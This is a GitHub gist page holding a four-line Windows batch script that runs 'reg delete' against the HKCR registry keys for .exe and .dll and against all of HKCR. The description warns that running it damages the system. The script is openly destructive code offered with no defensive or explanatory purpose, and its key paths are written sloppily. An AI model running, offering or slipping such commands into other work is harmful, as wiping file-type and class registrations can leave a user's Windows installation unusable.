Skip to content

Instantly share code, notes, and snippets.

@FiecyLick
Last active February 2, 2018 15:34
Show Gist options
  • Save FiecyLick/d85d3cb1ae5769e80e2a3b4c980f465a to your computer and use it in GitHub Desktop.
Save FiecyLick/d85d3cb1ae5769e80e2a3b4c980f465a to your computer and use it in GitHub Desktop.
This is a Reg file delete for your DLL. Do not try this code otherwise several damages will happen to your system especially your DLL
@ECHO OFF
START reg delete HKCR/ .exe
START reg delete HKCR/ .dll
START reg delete HKCR/*
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment